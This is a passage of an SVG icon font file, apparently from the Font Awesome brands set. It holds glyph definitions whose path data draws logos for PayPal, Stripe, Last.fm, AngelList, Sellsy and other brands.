c0 14.1006 10.7002 20.7002 23.5 20.7002h33.2002v-14.5996h-30.4004c-4.2998 0 -9.2002 -0.800781 -9.2002 -6.40039c0 -15.0996 42.9004 6.90039 42.9004 -26.2998c0 -16.4004 -11.4004 -22 -26.2002 -22h-32.2002l0.100586 14.7998h32.2002zM445.7 165.1h-38.5v-12.5
h37.7998v-14.0996h-37.9004v-13.7998l38.6006 -0.299805l-0.100586 -14.3008h-55.1992l0.0996094 69.3008h55.2002v-14.3008zM389.4 273.2c0.299805 0.299805 1.69922 1 7.2998 1c1 0 2 -0.100586 3.09961 -0.100586l-7.2998 -16.8994
c-2.2998 0 -3.2002 0.399414 -3.40039 0.5c-0.199219 0.200195 -1.09961 1.89941 -1.09961 7.89941c0 5.40039 1.09961 7.40039 1.40039 7.60059zM409.8 283.7h-0.0996094h0.0996094zM393.6 298.9h16.1006v-15.2002c-17.4004 0.299805 -33.1006 4.09961 -33.1006 -19.7002
c0 -11.7998 2.80078 -19.9004 16.1006 -19.9004h7.39941l23.5 54.5h24.8008l27.8994 -65.3994v65.3994h25.2998l29.1006 -48.0996v48.0996h16.8994v-69h-23.5996l-31.2002 51.9004v-51.9004h-33.7002l-6.59961 15.3008h-34.2998l-6.40039 -15.3008h-19.2002
c-22.7998 0 -33 11.8008 -33 34c0 23.3008 10.5 35.3008 34 35.3008zM435.7 286.8l-11.6006 -27.5996h22.8008zM334.6 298.8h16.9004v-69.2998h-16.9004v69.2998z" />
    <glyph glyph-name="cc-paypal" unicode="&#xf1f4;" horiz-adv-x="576" 
d="M186.3 189.8c0 -12.2002 -9.7002 -21.5 -22 -21.5c-9.2002 0 -16 5.2002 -16 15c0 12.2002 9.5 22 21.7002 22c9.2998 0 16.2998 -5.7002 16.2998 -15.5zM80.5 238.3c11.2998 0 19.7998 -1.5 17.5 -14.8994c-2 -12.7002 -10.5 -14.2002 -21.5 -14.2002l-8.2002 -0.299805
l4.2998 26.6992c0.200195 1.7002 1.7002 2.7002 3.2002 2.7002h4.7002zM364.5 238.3c8.5 0 18 -0.5 18.0996 -11.0996c0 -15 -9 -18 -22 -18l-8 -0.299805l4.2002 26.6992c0.200195 1.7002 1.40039 2.7002 3.2002 2.7002h4.5zM576 368v-352c0 -26.5 -21.5 -48 -48 -48h-480
c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h480c26.5 0 48 -21.5 48 -48zM128.3 232.6c0 21 -16.2002 28 -34.7002 28h-40c-2.5 0 -5 -2 -5.19922 -4.69922l-16.4004 -102.101c-0.299805 -2 1.2002 -4 3.2002 -4h19c2.7002 0 5.2002 2.90039 5.5 5.7002l4.5 26.5996
c1 7.2002 13.2002 4.7002 18 4.7002c28.5996 0 46.0996 17 46.0996 45.7998zM212.5 223.8h-19c-3.7998 0 -4 -5.5 -4.2002 -8.2002c-5.7998 8.5 -14.2002 10 -23.7002 10c-24.5 0 -43.1992 -21.5 -43.1992 -45.1992c0 -19.5 12.1992 -32.2002 31.6992 -32.2002
c9 0 20.2002 4.89941 26.5 11.8994c-0.5 -1.5 -1 -4.69922 -1 -6.19922c0 -2.30078 1 -4 3.2002 -4h17.2002c2.7002 0 5 2.89941 5.5 5.69922l10.2002 64.3008c0.299805 1.89941 -1.2002 3.89941 -3.2002 3.89941zM253 125.9l63.7002 92.5996c0.5 0.5 0.5 1 0.5 1.7002
c0 1.7002 -1.5 3.5 -3.2002 3.5h-19.2002c-1.7002 0 -3.5 -1 -4.5 -2.5l-26.5 -39l-11 37.5c-0.799805 2.2002 -3 4 -5.5 4h-18.7002c-1.69922 0 -3.19922 -1.7998 -3.19922 -3.5c0 -1.2002 19.5 -56.7998 21.1992 -62.1006c-2.69922 -3.7998 -20.5 -28.5996 -20.5 -31.5996
c0 -1.7998 1.5 -3.2002 3.2002 -3.2002h19.2002c1.7998 0.100586 3.5 1.10059 4.5 2.60059zM412.3 232.6c0 21 -16.2002 28 -34.7002 28h-39.6992c-2.7002 0 -5.2002 -2 -5.5 -4.69922l-16.2002 -102c-0.200195 -2 1.2998 -4 3.2002 -4h20.5c2 0 3.5 1.5 4 3.19922l4.5 29
c1 7.2002 13.1992 4.7002 18 4.7002c28.3994 0 45.8994 17 45.8994 45.7998zM496.5 223.8h-19c-3.7998 0 -4 -5.5 -4.2998 -8.2002c-5.5 8.5 -14 10 -23.7002 10c-24.5 0 -43.2002 -21.5 -43.2002 -45.1992c0 -19.5 12.2002 -32.2002 31.7002 -32.2002
c9.2998 0 20.5 4.89941 26.5 11.8994c-0.299805 -1.5 -1 -4.69922 -1 -6.19922c0 -2.30078 1 -4 3.2002 -4h17.2998c2.7002 0 5 2.89941 5.5 5.69922l10.2002 64.3008c0.299805 1.89941 -1.2002 3.89941 -3.2002 3.89941zM544 257.1c0 2 -1.5 3.5 -3.2002 3.5h-18.5
c-1.5 0 -3 -1.19922 -3.2002 -2.69922l-16.1992 -104l-0.300781 -0.5c0 -1.80078 1.5 -3.5 3.5 -3.5h16.5c2.5 0 5 2.89941 5.2002 5.69922l16.2002 101.2v0.299805zM454 205.3c9.2998 0 16.2998 -5.7002 16.2002 -15.5c0 -12.2998 -9.7002 -21.5 -21.7002 -21.5
c-9.2002 0 -16.2002 5.2998 -16.2002 15c0 12.2998 9.5 22 21.7002 22z" />
    <glyph glyph-name="cc-stripe" unicode="&#xf1f5;" horiz-adv-x="576" 
d="M492.4 227.2c8.69922 0 18 -6.7002 18 -22.7002h-36.7002c0 16 9.7998 22.7002 18.7002 22.7002zM375 224.6c12.9004 0.100586 21.9004 -14.5 21.9004 -33.0996c0 -19.0996 -8.80078 -33.4004 -21.9004 -33.4004c-8.2998 0 -13.2998 3 -16.7998 6.7002l-0.200195 52.7998
c3.7002 4.10059 8.7998 7 17 7zM528 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-480c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h480zM122.2 166.9c0 42.2998 -54.2998 34.6992 -54.2998 50.6992c0 5.5 4.59961 7.7002 12.0996 7.7002
c10.7998 0 24.5 -3.2998 35.2998 -9.09961v33.3994c-11.7998 4.7002 -23.5 6.5 -35.2998 6.5c-28.7998 0 -48 -15 -48 -40.1992c0 -39.3008 54 -32.9004 54 -49.9004c0 -6.59961 -5.7002 -8.7002 -13.5996 -8.7002c-11.8008 0 -26.9004 4.90039 -38.9004 11.2998v-33.8994
c13.2002 -5.7002 26.5996 -8.10059 38.7998 -8.10059c29.6006 0.200195 49.9004 14.7002 49.9004 40.3008zM191 223.5v30.2998h-26.9004v30.7998l-34.6992 -7.39941l-0.200195 -113.9c0 -21 15.7998 -36.5 36.8994 -36.5c11.6006 0 20.2002 2.10059 24.9004 4.7002v28.9004
c-4.5 -1.80078 -27 -8.30078 -27 12.5996v50.5h27zM265 221.1v32.7002h-0.0996094c-4.7002 1.7002 -21.3008 4.7998 -29.6006 -10.5l-2.2002 10.5h-30.6992v-124.5h35.5v84.4004c8.39941 11 22.5996 8.89941 27.0996 7.39941zM309.1 129.3v124.5h-35.6992v-124.5h35.6992z
M309.1 272.2v28.8994l-35.6992 -7.59961v-28.9004zM383.2 126.7c25.3994 0.0996094 48.5996 20.5 48.5996 65.5996c0 41.2998 -23.5 63.7998 -48.3994 63.7998c-13.9004 0 -22.9004 -6.59961 -27.8008 -11.0996l-1.7998 8.7998h-31.2998v-165.8l35.5 7.5l0.0996094 40.2002
c5.10059 -3.7002 12.7002 -9 25.1006 -9zM543.6 178.2c0.100586 2 0.400391 9.39941 0.400391 12.8994c0 36.4004 -17.5996 65.1006 -51.2998 65.1006c-33.7998 0 -54.2998 -28.7002 -54.2998 -64.9004c0 -42.7998 24.1992 -64.5 58.7998 -64.5
c17 0 29.7002 3.90039 39.3994 9.2002v28.5996c-9.69922 -4.89941 -20.7998 -7.89941 -34.8994 -7.89941c-13.7998 0 -26 4.89941 -27.6006 21.5h69.5z" />
    <glyph glyph-name="lastfm" unicode="&#xf202;" horiz-adv-x="512" 
d="M225.8 80.9004c0 0 -31.7002 -31.1006 -97.8994 -31.1006c-82.2002 0 -127.9 48.1006 -127.9 137.2c0 92.7002 45.7002 147.2 131.8 147.2c117.7 0 129.3 -66.2002 161.3 -163c14 -42.7998 38.7002 -73.9004 97.9004 -73.9004c39.9004 0 61 8.7998 61 30.5
c0 31.9004 -34.9004 35.1006 -79.7998 45.7002c-48.6006 11.7002 -68 36.9004 -68 76.7998c0 64 51.5996 83.9004 104.399 83.9004c59.8008 0 96.2002 -21.7002 100.9 -74.5l-58.5996 -7c-2.30078 25.2002 -17.5 35.7998 -45.7002 35.7998
c-25.7998 0 -41.6006 -11.7998 -41.6006 -31.7002c0 -17.5996 7.60059 -28.0996 33.4004 -34c52.2998 -11.5 115 -19.2002 115 -92.0996c0 -58.6006 -49.2998 -80.9004 -122 -80.9004c-101.4 0 -136.6 45.7002 -155.4 102.601
c-26.0996 81.5996 -34.3994 134.899 -100.899 134.899c-35.7002 0 -72.1006 -25.7998 -72.1006 -97.8994c0 -56.3008 28.7002 -91.5 69.2002 -91.5c45.7002 0 76.2002 34 76.2002 34z" />
    <glyph glyph-name="lastfm-square" unicode="&#xf203;" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352zM307.8 103.1c45.4004 0 76.2002 13.9004 76.1006 50.6006c0 45.5 -39.1006 50.3994 -71.8008 57.5
c-16.0996 3.7002 -20.8994 10.2998 -20.8994 21.2998c0 12.5 9.89941 19.7998 26 19.7998c17.5996 0 27.0996 -6.59961 28.5996 -22.3994l36.7002 4.39941c-2.90039 33 -25.5996 46.6006 -63 46.6006c-32.9004 0 -65.2002 -12.4004 -65.2002 -52.4004
c0 -24.9004 12.1006 -40.7002 42.5 -48c28.1006 -6.59961 49.9004 -8.7002 49.9004 -28.5996c0 -13.6006 -13.2002 -19.1006 -38.1006 -19.1006c-37 0 -52.3994 19.4004 -61.1992 46.2002c-20 60.5 -27.3008 101.9 -100.801 101.9c-53.8994 0 -82.5 -34.1006 -82.5 -92
c0 -55.7002 28.6006 -85.8008 79.9004 -85.8008c41.4004 0 61.2002 19.4004 61.2002 19.4004l-11.7002 31.9004s-19 -21.3008 -47.5996 -21.3008c-25.3008 0 -43.3008 22 -43.3008 57.2002c0 45.1006 22.7002 61.2002 45.1006 61.2002c41.5 0 46.7002 -33.2998 63 -84.2998
c11.7002 -35.5 33.7002 -64.1006 97.0996 -64.1006z" />
    <glyph glyph-name="ioxhost" unicode="&#xf208;" horiz-adv-x="640" 
d="M616 288c13.2998 0 24 -10.7002 24 -24c0 -13.2002 -10.7002 -24 -24 -24h-52.7002c3.10059 -15.5 4.7002 -31.5996 4.7002 -48c0 -137 -111 -248 -248 -248c-102.9 0 -191.2 62.7002 -228.7 152h-67.2998c-13.2998 0 -24 10.7002 -24 24c0 13.2002 10.7002 24 24 24
h52.7002c-3.10059 15.5 -4.7002 31.5996 -4.7002 48c0 137 111 248 248 248c102.9 0 191.2 -62.7002 228.7 -152h67.2998zM520 192c0 16.5996 -2 32.5996 -5.7998 48h-298.2c-13.2998 0 -24 10.7002 -24 24c0 13.2002 10.7002 24 24 24h279.5
c-33.9004 62 -99.7998 104 -175.5 104c-110.5 0 -200 -89.5 -200 -200c0 -16.5996 2 -32.5996 5.7998 -48h298.2c13.2998 0 24 -10.7002 24 -24c0 -13.2002 -10.7002 -24 -24 -24h-279.5c33.9004 -62 99.7998 -104 175.5 -104c110.5 0 200 89.5 200 200zM216 216h208
c13.2998 0 24 -10.7002 24 -24c0 -13.2002 -10.7002 -24 -24 -24h-208c-13.2998 0 -24 10.7002 -24 24c0 13.2002 10.7002 24 24 24z" />
    <glyph glyph-name="angellist" unicode="&#xf209;" 
d="M347.1 232.6c48 -11.6992 54.9004 -50.5996 54.9004 -93.6992c0 -114.301 -73.4004 -202.9 -191.4 -202.9c-96.1992 0 -164.6 76.4004 -164.5 148.6c0 37.1006 14.2002 61.7002 51.1006 71.7002c-3.10059 8.2998 -8 20.7998 -8 29.7002
c0 23.5 24.8994 52.5996 48.2998 52.5996c6.90039 0 13.7002 -2 20 -4.2998c-12.4004 35.2002 -46.5996 126.7 -46.5996 162c0 28.7998 14.5996 51.7002 45.6992 51.7002c40 0 85.4004 -144 95.1006 -172.5c12.5 31.4004 52.5 163.1 97.0996 163.1
c28 0 43.7002 -22.2998 43.7002 -48.8994c0 -30.2002 -33.7002 -124.5 -45.4004 -157.101zM311.7 340l-33.1006 -93.7002l34 -6c8.5 23.4004 47.1006 128.9 47.1006 148c0 7.10059 -2.2998 16 -10.9004 16c-16 0 -33.0996 -52 -37.0996 -64.2998zM142.3 399.7
c0 -29.1006 34.6006 -120 45.5 -148.8c7.7002 4.39941 19.7998 2.69922 35.4004 1.39941l-34.6006 100.3c-31.7998 92.8008 -46.2998 59 -46.2998 47.1006zM140 204c-7.7002 0 -20.2998 -13.4004 -20.4004 -21.0996c0 -20.8008 56 -97.7002 76.9004 -97.7002
c5.7002 0 10.5996 6.2998 10.5996 11.3994c0 12.8008 -37.7998 107.4 -67.0996 107.4zM324.3 17.7002c55.2998 61.5 49.1006 158.6 31 174.7c-24 21.0996 -106 29.0996 -138.3 29.0996c-17.2998 0 -17.4004 -6.40039 -17.4004 -13.0996
c0 -43.7002 92.9004 -39.7002 120.601 -39.7002c11.2002 0 15.7998 -9.90039 16.8994 -21.1006c-7.39941 -7.39941 -17.6992 -11.6992 -27.3994 -15.3994c-9.40039 -3.40039 -19.1006 -7.10059 -27.1006 -13.1006c-22 -16 -43.6992 -43.3994 -43.6992 -71.6992
c0 -17.7002 10.5996 -32.9004 10.5996 -50.3008c0 -0.299805 -2 -6.5 -2 -7.39941c-32.5996 2.2998 -40.5996 34.5996 -41.7002 61.7002c-3.39941 -0.900391 -8 -0.600586 -11.7002 -0.600586c5.10059 -17.7998 -11.8994 -42 -38 -42
c-37.7998 0 -88 57.2002 -58.2998 86.9004c28.7002 -35.9004 35 -51.4004 51.1006 -51.4004c4 0 11.6992 3.40039 11.6992 8.2998c0 12.8008 -42.8994 73.1006 -54.2998 73.1006c-16.7998 0 -37.7002 -24.9004 -20.5996 -68.2998
c22.5996 -55.7002 69.5 -88.3008 128.899 -88.3008c43.4004 0 80.6006 16.6006 109.7 48.6006zM225.7 143.7c3.2002 -8.2998 6.59961 -16.6006 9.39941 -25.1006c6.30078 7.10059 12.9004 13.7002 20.3008 19.1006c-10 2 -20 2.89941 -29.7002 6z" />
    <glyph glyph-name="buysellads" unicode="&#xf20d;" 
d="M224 297.3l42.9004 -160.7h-85.8008zM448 368v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352c26.5 0 48 -21.5 48 -48zM382.7 42.7002l-94.5 298.7h-128.4l-94.5 -298.7h90.7002l111.7 91.5996l24.2002 -91.5996h90.7998z
" />
    <glyph glyph-name="connectdevelop" unicode="&#xf20e;" horiz-adv-x="576" 
d="M550.5 207c6.69629 -1.33887 11.7861 -7.5 11.7881 -14.7324c0 -7.5 -5.3584 -13.6602 -12.3223 -15l-54.9111 -95.3574c0.536133 -1.60742 0.804688 -3.21387 0.804688 -4.82129c0 -7.23145 -5.09082 -13.3926 -12.0547 -14.7314l-51.6963 -90.2686
c0.535156 -1.33887 0.802734 -2.67773 0.802734 -4.28516c0 -8.30371 -6.69727 -15.2676 -15.2686 -15.2676c-4.28516 0 -8.30371 1.875 -10.9814 4.82129h-107.144c-2.67871 -3.21484 -6.96484 -5.35742 -11.5176 -5.35742s-8.83887 2.14258 -11.5166 5.35645h-106.875
c-2.67969 -3.21484 -6.69727 -5.35742 -11.5186 -5.35742c-8.30371 0 -15.2676 6.69727 -15.2676 15.2676c0 1.875 0.535156 3.75 1.07031 5.35742l-51.6963 89.7324c-6.96484 1.33887 -12.0547 7.5 -12.0547 14.7314c0 1.875 0.268555 3.21387 0.804688 4.82129
l-55.1797 95.3574c-6.96484 1.60742 -12.0537 7.76855 -12.0537 15c0 7.5 5.3584 13.6611 12.5898 15l53.3047 92.1436c0 0.536133 -0.268555 1.07227 -0.268555 1.60645c0 6.16113 3.75098 11.251 9.10742 13.6611l55.9824 97.2334
c-0.536133 1.33887 -1.07129 3.21387 -1.07129 4.82129c0 8.57129 6.96484 15.2676 15.2676 15.2676c4.82227 0 8.83887 -2.14258 11.7861 -5.625h106.071c2.67871 3.48242 6.69629 5.625 11.5176 5.625s8.83887 -2.14258 11.5176 -5.62402h106.606
c2.94727 3.48242 6.96484 5.625 11.7861 5.625c8.30371 0 15.2676 -6.69727 15.2676 -15.2676c0 -1.60742 -0.535156 -3.21484 -1.07031 -4.82129l55.4463 -95.8936c8.03613 -0.267578 14.7324 -6.96484 14.7324 -15.001c0 -2.67871 -0.803711 -5.08984 -1.875 -7.23145z
M153.535 -2.73242v75.8037h-43.6602zM153.535 81.1074v50.624l-44.999 -47.4102c0.535156 -1.07227 1.07129 -2.14355 1.33887 -3.21387h43.6602zM153.535 143.518l0.000976562 92.9463l-50.0889 51.9648c-2.41113 -1.60645 -5.08887 -2.41113 -7.76855 -2.67871
l-51.9648 -90c0.268555 -1.07227 0.268555 -2.14258 0.268555 -3.48242c0 -1.33887 0 -2.67871 -0.535156 -4.01758l55.7129 -96.4287c1.33887 -0.267578 2.67871 -1.07129 4.01758 -1.60742zM153.535 245.84v72.0527l-43.9277 -15.8037
c0 -0.267578 0.267578 -0.803711 0.267578 -1.07227c0 -2.94531 -0.803711 -5.62402 -2.14258 -7.7666zM153.535 326.465v59.7324l-43.6602 -75.5361zM480.054 287.357l-0.267578 0.267578l-98.0361 -101.518l63.75 -67.2324l35.3584 167.143zM291.75 92.8926
l-11.25 -11.7852h22.7676zM291.482 104.143l79.2852 82.2324l-83.0352 87.5889l-79.5537 -84.375zM296.839 98.25l16.875 -17.1426h124.02l5.8916 28.125l-67.5 71.25zM410.411 403.607l-117.053 -124.019l83.0342 -87.5889l97.5 101.25
c-1.33984 2.14258 -2.14258 4.82129 -2.14258 7.7666v0.536133l-57.8574 100.714c-1.33984 0.268555 -2.41016 0.804688 -3.48145 1.34082zM401.304 405.75h-4.28711l-166.339 -60l57.0547 -60.2676zM277.821 405.75h-103.929l50.8936 -53.5713l148.393 53.5713h-75
c-2.67871 -2.67773 -6.16016 -4.28516 -10.1787 -4.28516s-7.50098 1.60742 -10.1787 4.28516zM161.572 400.125v-70.7148l54.9111 19.8213l-51.1611 53.8398c-0.730469 -0.25293 -1.93066 -0.613281 -2.67969 -0.804688zM161.572 320.839v-83.3037l40.9814 -42.0527
l79.5537 84.1064l-59.7324 63.2139zM161.572 228.161v-76.0723l36.4277 38.3037zM161.572 140.303v-59.1953h107.678l17.1426 17.6777l-82.7676 85.9814zM168.536 -21.75h1.33887l91.6074 94.8213h-99.9102v-89.7324l1.07031 -1.60645
c2.41113 -0.804688 4.28613 -1.875 5.89355 -3.48242zM298.447 -21.75h104.194l-91.6064 94.8213h-38.3037l-91.6074 -94.8213h96.4287c2.68066 2.41016 6.42871 4.28516 10.4473 4.28516s7.76758 -1.875 10.4473 -4.28516zM418.447 -9.96387l17.4121 83.0361h-114.376
l89.1953 -91.875c1.07227 0.536133 2.14355 1.07031 3.48242 1.33887zM431.303 12.2676l34.8223 60.8037h-21.9639zM466.125 81.1074c0.267578 1.07129 0.803711 2.14258 1.33887 2.94531l-17.1426 18.2139l-4.55371 -21.1592h20.3574zM532.286 188.518
c-0.268555 1.33984 -0.536133 2.41113 -0.536133 3.75c0 1.60742 0.536133 2.94629 0.802734 4.28516l-45.8027 79.2861l-34.5537 -163.928l20.625 -21.9639c1.33887 0.802734 2.67871 1.33887 4.01758 1.87402z" />
    <glyph glyph-name="dashcube" unicode="&#xf210;" 
d="M326.6 344l102.2 104v-427c0 -50.5 -40.0996 -85 -91.2002 -85h-227.199c-51.1006 0 -91.2002 34.5 -91.2002 85v229.5c0 50.2002 40.0996 93.5 91.2002 93.5h216.199zM153.9 31.5v-0.0996094h223.8l-51.1006 52.2998v123.5c0 17.7002 -14.2998 32.5 -32 32.5h-140.699
c-17.7002 0 -32.4004 -14.7998 -32.4004 -32.5v-142.9c0 -17.7002 14.7002 -32.7998 32.4004 -32.7998z" />
    <glyph glyph-name="forumbee" unicode="&#xf211;" 
d="M5.7998 138.3c-3.7998 17 -5.7998 34.2002 -5.7998 51.4004c0 123.3 99.7998 223.3 223.1 223.3c16.6006 0 33.3008 -2 49.3008 -5.5c-123.4 -47 -220.5 -145.5 -266.601 -269.2zM398.7 327.5c-151.101 -44 -269.2 -164.4 -312.3 -315.7
c-17.2002 13.4004 -32.7002 30.9004 -45.2002 49c43.3994 149.9 160.1 267.7 309.7 312c18.0996 -12.5996 34.0996 -27.7998 47.7998 -45.2998zM414.5 74.7998c13.0996 -35.2998 24.2002 -73.2998 33.5 -109.8c-36.0996 9.2998 -72 20.5 -107 33.5996
c-25.7002 -16 -54.5996 -26.8994 -84.5996 -31.2998c42.5996 79.7002 108.199 147.4 187.6 190.3c-4.09961 -29.0996 -14.2998 -57.6992 -29.5 -82.7998zM444.2 220.3c-113.7 -46.7002 -204.2 -139.399 -250.5 -253.5c-19.6006 2.7002 -38.5 7.60059 -56.6006 15.2002
c44.9004 138.5 153.4 249.3 291.301 295.1c7.89941 -18.0996 13.1992 -37.2998 15.7998 -56.7998z" />
    <glyph glyph-name="leanpub" unicode="&#xf212;" horiz-adv-x="576" 
d="M386.539 336.515l15.0957 -248.955l-10.9785 0.275391c-36.2324 0.824219 -71.6406 -8.7832 -102.657 -27.9971c-31.0156 19.2139 -66.4238 27.9971 -102.657 27.9971c-45.5635 0 -82.0693 -10.7051 -123.516 -27.7227l31.291 258.288
c28.5459 11.8027 61.4834 18.1143 92.2256 18.1143c41.1729 0 73.8359 -13.1748 102.657 -42.5439c27.7227 28.2715 59.0127 41.7217 98.5391 42.5439zM569.07 0c-25.5264 0 -47.4854 5.21484 -70.542 15.6445c-34.3105 15.6455 -69.9932 24.9785 -107.871 24.9785
c-38.9775 0 -74.9346 -12.9014 -102.657 -40.623c-27.7227 27.7227 -63.6797 40.623 -102.657 40.623c-37.8779 0 -73.5605 -9.33301 -107.871 -24.9785c-22.2324 -9.88086 -44.7402 -15.6445 -69.1689 -15.6445h-1.37305l42.5449 349.141
c39.251 22.2334 87.0117 34.8594 132.301 34.8594c37.0547 0 75.209 -7.68457 106.225 -29.0947c31.0156 21.4102 69.1699 29.0947 106.225 29.0947c45.2891 0 93.0498 -12.626 132.301 -34.8594zM525.702 44.7412l-34.0361 280.246
c-30.7422 13.999 -67.248 21.4102 -101.009 21.4102c-38.4287 0 -74.3848 -12.0771 -102.657 -38.7021c-28.2725 26.625 -64.2275 38.7021 -102.657 38.7021c-33.7607 0 -70.2666 -7.41113 -101.009 -21.4102l-34.0361 -280.246
c47.2109 19.4863 82.8945 33.4854 135.045 33.4854c37.6045 0 70.8174 -9.60547 102.657 -29.6436c31.8398 20.0381 65.0518 29.6436 102.657 29.6436c52.1504 0 87.834 -13.999 135.045 -33.4854z" />
    <glyph glyph-name="sellsy" unicode="&#xf213;" horiz-adv-x="640" 
d="M539.71 210.692c55.1572 -13.4834 94.0742 -63.124 94.0732 -119.509c0 -68.0264 -55.4639 -123.184 -123.185 -123.184h-381.197c-67.7217 0 -123.186 55.1572 -123.185 123.185c0 47.4961 27.8848 91.0098 70.7852 111.234
c-2.14453 7.35449 -3.06543 15.0146 -3.06543 22.3691c0 46.2705 37.6914 83.9609 83.9629 83.9609c20.2227 0 39.835 -7.35449 55.1562 -20.5303c18.3867 74.7695 85.8008 127.781 163.021 127.781c92.542 0 167.924 -75.3818 167.924 -167.924
c0 -12.5635 -1.22559 -25.127 -4.29004 -37.3838zM199.88 46.4463v110.928c0 8.27344 -7.04688 15.3213 -15.3213 15.3213h-30.9482c-8.27344 0 -15.3213 -7.04785 -15.3213 -15.3213v-110.928c0 -8.27344 7.04688 -15.3213 15.3213 -15.3213h30.9482
c8.27344 0 15.3213 7.04688 15.3213 15.3213zM289.357 46.4463v131.458c0 8.27246 -7.04883 15.3203 -15.3223 15.3203h-30.9492c-8.27246 0 -15.3213 -7.04688 -15.3213 -15.3203v-131.458c0 -8.27344 7.04688 -15.3213 15.3213 -15.3213h30.9492
c8.27344 0 15.3223 7.04688 15.3223 15.3213zM378.834 46.4463v162.714c0 8.27246 -7.04688 15.3213 -15.3213 15.3213h-30.9482c-8.27441 0 -15.3223 -7.04785 -15.3223 -15.3213v-162.714c0 -8.27344 7.04785 -15.3213 15.3223 -15.3213h30.9482
c8.27441 0 15.3213 7.04688 15.3213 15.3213zM465.861 46.4463v224.612c0 8.58008 -7.04785 15.6279 -15.3223 15.6279h-28.4971c-8.27441 0 -15.3213 -7.04883 -15.3213 -15.6279v-224.612c0 -8.27344 7.04688 -15.3213 15.3213 -15.3213h28.4971
c8.27441 0 15.3223 7.04688 15.3223 15.3213z" />
    <glyph glyph-name="shirtsinbulk" unicode="&#xf214;" 
d="M100 37.7002l4.40039 9.89941l30.5996 -13.3994l-4.40039 -9.90039zM139.4 20.2002l4.39941 9.89941l30.6006 -13.3994l-4.40039 -9.90039zM311.5 34.2002l30.5996 13.3994l4.40039 -9.89941l-30.5996 -13.4004zM179.1 3l4.40039 9.59961l30.2998 -13.3994
l-4.39941 -9.90039zM60.4004 55.2002l4.39941 9.89941l30.6006 -13.6992l-4.40039 -9.60059zM271.8 16.7002l30.6006 13.3994l4.39941 -9.89941l-30.5996 -13.4004zM232.5 -0.799805l30.5996 13.3994l4.40039 -9.59961l-30.5996 -13.7002zM350.9 51.4004l30.5996 13.6992
l4.40039 -9.89941l-30.6006 -13.4004zM170 401.4v-10.5h-33.5v10.5h33.5zM122.8 401.4l-0.0996094 -10.5h-33.5v10.5h33.5996zM75.5 401.4l0.0996094 -10.5h-33.2998v10.5h33.2002zM217 401.4v-10.5h-33.2002v10.5h33.2002zM311.5 401.4v-10.5h-33.5v10.5h33.5zM358.8 401.4
v-10.5h-33.5v10.5h33.5zM264.2 401.4v-10.5h-33.2002v10.5h33.2002zM405.7 401.4v-10.5h-33.2998v10.5h33.2998zM52.7998 96.9004v-33.5h-10.7998v33.5h10.7998zM122.8 312.8l-0.0996094 -10.5h-33.5v10.5h33.5996zM52.7998 302.2v-23h-10.7998v33.5h33.5996v-10.5h-22.7998
zM221.7 73.5996c-50.2002 0 -91.2998 40.8008 -91.2998 91.3008c0 50.1992 41.0996 91.2998 91.2998 91.2998c50.5 0 91.2998 -41.1006 91.2998 -91.2998c0 -50.5 -40.7998 -91.3008 -91.2998 -91.3008zM173.5 184.7c0 -44.2998 77.5996 -11.9004 77.5996 -38
c0 -13.1006 -24 -14.2998 -32.6992 -14.2998c-12.3008 0 -29.8008 2.69922 -35.9004 14.8994h-0.900391l-9 -18.3994c14.8008 -9.30078 29.1006 -12.2002 47.2002 -12.2002c19.5 0 51 5.7998 51 31.2002c0 48.0996 -78.5 16.2998 -78.5 37.8994
c0 13.1006 20.7998 14.9004 29.7998 14.9004c10.8008 0 29.2002 -3.2002 35.6006 -13.1006h0.899414l8.80078 16.9004c-15.1006 6.2002 -27.4004 12 -44.3008 12c-20.0996 0 -49.5996 -6.40039 -49.5996 -31.7998zM52.7998 269.6v-33.5996h-10.7998v33.5996h10.7998z
M395.2 63.4004v33.5h10.7998v-33.5h-10.7998zM52.7998 140.1v-33.5h-10.7998v33.5h10.7998zM0 444.3h448v-406l-226.3 -98.5996l-221.7 98.5996v406zM418.8 57.2002h0.100586v270.1h-389.7v-270.1l192.8 -85.7002zM418.8 356.5h0.100586v58.5996h-389.7v-58.5996h389.6z
M52.7998 226.4v-33.5h-10.7998v33.5h10.7998zM52.7998 183.2v-33.5h-10.7998v33.5h10.7998zM170 312.8v-10.5h-33.5v10.5h33.5zM395.2 149.7v33.5h10.7998v-33.5h-10.7998zM395.2 192.9v33.5h10.7998v-33.5h-10.7998zM217 312.8v-10.5h-33.2002v10.5h33.2002zM395.2 236
v33.5h10.7998v-33.5h-10.7998zM395.2 106.5v33.5h10.7998v-33.5h-10.7998zM264.2 312.8v-10.5h-33.2002v10.5h33.2002zM311.5 312.8v-10.5h-33.5v10.5h33.5zM395.2 279.2l0.0996094 23h-22.7998v10.5h33.5v-33.5h-10.7998zM358.8 312.8v-10.5h-33.5v10.5h33.5z" />
    <glyph glyph-name="simplybuilt" unicode="&#xf215;" horiz-adv-x="512" 
d="M481.2 384c14.7002 0 26.5 -11.7998 26.7002 -26.2998v-331.4c0 -14.5 -11.8008 -26.2998 -26.6006 -26.2998h-450.399c-14.8008 0 -26.6006 11.7998 -26.6006 26.2998v331.4c0 14.5 11.7998 26.2998 26.4004 26.2998h106c14.5996 0 26.5996 -11.7998 26.5996 -26.2998
v-39.6006h185.3v39.6006c0 14.5 12.1006 26.2998 26.6006 26.2998h106zM149.8 92.2002c36.9004 0 66.6006 29.7002 66.6006 66.3994c0 36.9004 -29.7002 66.6006 -66.6006 66.6006c-36.7002 0 -66.3994 -29.7002 -66.3994 -66.6006
c0 -36.6992 29.7998 -66.3994 66.3994 -66.3994zM362.2 92.2002c36.5996 0 66.3994 29.7002 66.3994 66.5996c0 36.7002 -29.7998 66.4004 -66.3994 66.4004c-36.9004 0 -66.6006 -29.7998 -66.6006 -66.4004c0 -36.8994 29.7002 -66.5996 66.6006 -66.5996z" />
    <glyph glyph-name="skyatlas" unicode="&#xf216;" horiz-adv-x="640" 
